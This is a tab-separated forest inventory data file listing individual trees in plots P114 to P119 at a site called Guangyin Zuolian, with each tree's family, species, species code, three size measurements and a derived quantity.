Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9	8	0.0840793
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	9.8	6	0.156834
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	10	5	0.0436013
Guangyin Zuolian	2	P114	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	1	0.0613767
Guangyin Zuolian	2	P114	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	1.7	0.8	0.000372052
Guangyin Zuolian	2	P114	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	3.5	1.6	0.00162093
Guangyin Zuolian	2	P114	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	5	1.7	0.00395057
Guangyin Zuolian	2	P114	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	7	8	3	0.0179278
Guangyin Zuolian	2	P114	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	8	0.9	0.00627639
Guangyin Zuolian	2	P114	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	8	3	1.5	0.00876455
Guangyin Zuolian	2	P114	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	3.5	2	0.00278028
Guangyin Zuolian	2	P114	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	12	6.5	5	0.0401542
Guangyin Zuolian	2	P114	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	7	6	0.0157184
Guangyin Zuolian	2	P114	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	3.5	6	5.5	0.00368033
Guangyin Zuolian	2	P114	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	3	6.5	5	0.00298241
Guangyin Zuolian	2	P114	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	6	0.0492664
Guangyin Zuolian	2	P114	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	9	4.5	0.0393034
Guangyin Zuolian	2	P114	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	10	5	0.0521352
Guangyin Zuolian	2	P114	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	11	6.5	0.0783376
Guangyin Zuolian	2	P114	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	3	1.3	0.00238863
Guangyin Zuolian	2	P114	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5	1.8	0.00600364
Guangyin Zuolian	2	P114	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	6	5	0.0135042
Guangyin Zuolian	2	P114	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	7	4	0.0201917
Guangyin Zuolian	2	P115	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	11	7	6	0.0366909
Guangyin Zuolian	2	P115	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.5	1.5	0.00116368
Guangyin Zuolian	2	P115	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	25	8	2	0.195157
Guangyin Zuolian	2	P115	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	30	8.5	4.5	0.291622
Guangyin Zuolian	2	P115	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	3.5	1.5	0.00422516
Guangyin Zuolian	2	P115	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.5	0.000118999
Guangyin Zuolian	2	P115	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	1	0.00043664
Guangyin Zuolian	2	P115	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2.5	0.5	0.00116368
Guangyin Zuolian	2	P115	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	5	2.5	0.5	0.00303328
Guangyin Zuolian	2	P115	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	2.5	1.5	0.000543971
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	3.5	1.7	0.00594767
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	5	2.5	0.0180792
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6	4	0.0135042
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	6	4	0.0263625
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	8	6	0.0418484
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	6.5	0.0492664
Guangyin Zuolian	2	P115	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	8	4	0.0748697
Guangyin Zuolian	2	P115	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	4	2.8	1.7	0.0022317
Guangyin Zuolian	2	P115	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	5	4	2	0.00481906
Guangyin Zuolian	2	P115	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	6	6	4.5	0.0101137
Guangyin Zuolian	2	P115	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	3	0.5	0.0013926
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	1.8	0.7	0.000393599
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	2.5	1	0.00014825
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	3	2.5	0.00362997
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	3.5	2	0.00422516
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	3.5	2	0.00594767
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	4	3	0.00905786
Guangyin Zuolian	2	P115	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	4	2.5	0.0116356
Guangyin Zuolian	2	P116	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	8	8	6	0.0230299
Guangyin Zuolian	2	P116	Lauraceae	Litsea	Litsea elongata (Wall. ex Nees) Benth. et Hook.	LITELO	10	8	5	0.0349983
Guangyin Zuolian	2	P116	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	5	6	3	0.00718464
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	5.5	3.5	0.00252993
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	5	3	0.00107666
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	5	6	4	0.00718464
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	5	6	5	0.00718464
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	6	5	0.0101137
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	7	5	0.011772
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	7	7	5	0.0157184
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	7	7	5	0.0157184
Guangyin Zuolian	2	P116	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	10	7	5	0.0306851
Guangyin Zuolian	2	P116	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2.5	1.5	0.00116368
Guangyin Zuolian	2	P116	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	3	5	4	0.00230323
Guangyin Zuolian	2	P116	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	3	5	4	0.00230323
Guangyin Zuolian	2	P116	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	6	5	4	0.00845122
Guangyin Zuolian	2	P116	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	3	0.5	0.000177413
Guangyin Zuolian	2	P116	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	5	6.5	5.5	0.007774
Guangyin Zuolian	2	P116	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	6	6.5	5.5	0.0109433
Guangyin Zuolian	2	P116	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	6	7	5	0.011772
Guangyin Zuolian	2	P116	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	35	13	11	0.591737
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	4.5	3	0.00097053
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	4.5	3	0.00356116
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	5	4.5	3	0.00541185
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	6	5	3.5	0.00845122
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	7	5	0.00550289
Guangyin Zuolian	2	P116	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	10	7	5.5	0.0306851
Guangyin Zuolian	2	P116	Papilionaceae	Millettia	Millettia velutina Dunn	MILVEL	7	6	5	0.0135042
Guangyin Zuolian	2	P116	Styracaceae	Styrax	Styrax suberifolia Hook. et Arn.	STYSUB	6	8	6	0.0134267
Guangyin Zuolian	2	P116	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	3	0.000864223
Guangyin Zuolian	2	P116	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4	3	0.00184878
Guangyin Zuolian	2	P116	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	2	4	2.5	0.000864223
Guangyin Zuolian	2	P117	Euphorbiaceae	Glochidion	Glochidion wrightii Benth.	GLOWRI	12	7.5	2	0.0462321
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	3.5	1.5	0.00278028
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	4	1.3	0.000864223
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4	1.4	0.00184878
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4.5	1.4	0.0020762
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4.5	1.8	0.0020762
Guangyin Zuolian	2	P117	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	5.5	4.5	0.00659455
Guangyin Zuolian	2	P117	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	8	6	0.0492664
Guangyin Zuolian	2	P117	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.7	1.4	0.000142734
Guangyin Zuolian	2	P117	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	1.3	0.00043664
Guangyin Zuolian	2	P117	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	11	8	3.5	0.0418484
Guangyin Zuolian	2	P117	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	28	14	10	0.418865
Guangyin Zuolian	2	P117	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	2	2.5	2	0.000543971
Guangyin Zuolian	2	P117	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	3	3	2	0.0013926
Guangyin Zuolian	2	P117	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	3	1.8	0.0013926
Guangyin Zuolian	2	P117	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	3.5	2	0.00278028
Guangyin Zuolian	2	P117	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	7.5	2	0.0537205
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1.5	2	1.3	0.000254566
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2	1.4	0.00043664
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	3	1.8	0.0013926
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3.5	2	0.000757716
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3.5	1.7	0.000757716
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	3.5	1.8	0.00278028
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	4	1.6	0.00317108
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	4.5	1.6	0.0020762
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	4.5	1.8	0.00356116
Guangyin Zuolian	2	P117	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	4.5	1.5	0.00356116
Guangyin Zuolian	2	P117	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	3	3.5	1.7	0.00162093
Guangyin Zuolian	2	P117	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2	1.4	0.00043664
Guangyin Zuolian	2	P117	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4.5	3	0.00097053
Guangyin Zuolian	2	P117	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4.5	3	0.00356116
Guangyin Zuolian	2	P117	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	3	3.5	1.5	0.00162093
Guangyin Zuolian	2	P117	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	5	5	1.4	0.00600364
Guangyin Zuolian	2	P117	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	8	6.5	1.6	0.0187703
Guangyin Zuolian	2	P118	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	11	9	6	0.0469961
Guangyin Zuolian	2	P118	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	15	12	7	0.111622
Guangyin Zuolian	2	P118	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	5	7	5	0.00836267
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	1	3	2.3	0.000177413
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	4.5	3	0.00097053
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4.5	7.5	6	0.00734581
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	16	13	10	0.136319
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	21	13	10	0.227013
Guangyin Zuolian	2	P118	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	24	14	2.5	0.313701
Guangyin Zuolian	2	P118	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1	2.5	2	0.00014825
Guangyin Zuolian	2	P118	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3	2.5	0.000650978
Guangyin Zuolian	2	P118	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1	3.5	1.2	0.000206502
Guangyin Zuolian	2	P118	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	5	2	0.00107666
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	1.5	3	2.4	0.000379528
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7	5	0.011772
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7	5	0.011772
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7	4.5	0.011772
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	7	4	0.0201917
Guangyin Zuolian	2	P118	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	8	4.5	0.0349983
Guangyin Zuolian	2	P118	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	3	5	3	0.00230323
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.3	7.19498e-05
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.3	7.19498e-05
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.5	8.96359e-05
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.7	0.3	0.000216911
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.8	1.3	0.000393599
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	0.3	0.000254566
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.8	0.00043664
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.5	0.00043664
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.7	0.00043664
Guangyin Zuolian	2	P118	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.4	0.00043664
Guangyin Zuolian	2	P118	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	6	7.5	4	0.0125998
Guangyin Zuolian	2	P118	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	7	9	6	0.0201331
Guangyin Zuolian	2	P118	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	8	9	6	0.0258628
Guangyin Zuolian	2	P118	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	17	13	7.5	0.152734
Guangyin Zuolian	2	P118	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1	3	1.8	0.000177413
Guangyin Zuolian	2	P118	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	4	0.00550289
Guangyin Zuolian	2	P118	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	5	0.0230299
Guangyin Zuolian	2	P118	Styracaceae	Styrax	Styrax suberifolia Hook. et Arn.	STYSUB	10	8	5	0.0349983
Guangyin Zuolian	2	P118	Proteaceae	Helicia	Helicia reticulata W. T. Wang	HELRET	1	2	1	0.000118999
Guangyin Zuolian	2	P118	Proteaceae	Helicia	Helicia reticulata W. T. Wang	HELRET	2	3.5	1.5	0.000757716
Guangyin Zuolian	2	P118	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	2	3.5	2	0.000757716
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	2	1	0.000118999
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	1.5	0.000650978
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3.5	2	0.000757716
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3.5	1.5	0.000757716
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	2	0.000864223
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3.5	6	4	0.00368033
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	2	0.00472771
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	2	0.00472771
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	2.2	0.00472771
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	7	1.5	0.00149971
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7	2.3	0.00836267
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7	2	0.00836267
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	2.5	0.011772
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	7	5	0.0157184
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	8	2.2	0.0134267
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	8	4	0.0179278
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	13	9	3	0.0642881
Guangyin Zuolian	2	P118	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	14	11	7	0.0900186
Guangyin Zuolian	2	P118	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	1	2	0.5	0.000118999
Guangyin Zuolian	2	P118	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	1	2.4	1.3	0.000142407
Guangyin Zuolian	2	P118	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	2	2.5	1.4	0.000543971
Guangyin Zuolian	2	P119	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	1.5	0.2	0.000191753
Guangyin Zuolian	2	P119	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	1.8	1.5	0.000393599
Guangyin Zuolian	2	P119	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	2.8	3.8	1.5	0.00154436
Guangyin Zuolian	2	P119	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	2.5	4	1.8	0.00131335
Guangyin Zuolian	2	P119	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	4	4.5	1.6	0.00356116
Guangyin Zuolian	2	P119	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	1.6	2	1.7	0.000287322
Guangyin Zuolian	2	P119	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	9	7	0.0150783
Guangyin Zuolian	2	P119	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	9	8	0.0553266
Guangyin Zuolian	2	P119	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	24	9.6	8	0.216333
Guangyin Zuolian	2	P119	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	22	9.8	0.6	0.18753
Guangyin Zuolian	2	P119	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	0.8	0.6	0.000103239
Guangyin Zuolian	2	P119	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.6	1.4	0.000350486
Guangyin Zuolian	2	P119	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1.5	1.6	1.4	0.000204338
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	6	3	0.00275631
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	2.5	0.00550289
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9	8	0.0840793
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	9	7.5	0.118357
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	9	7.5	0.118357
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	9	3.5	0.172442
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9.2	7.2	0.0565374
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9.5	8	0.0159031
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9.5	4.5	0.0886782
Guangyin Zuolian	2	P119	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	9.5	8	0.23115
Guangyin Zuolian	2	P119	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	9	1.8	0.00704845
Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	2	0.6	0.000934077
Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	8	0.6	0.00627639
Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	18	8	3	0.105393
Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	20	8	0.5	0.128419
Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	18	9	8	0.118357
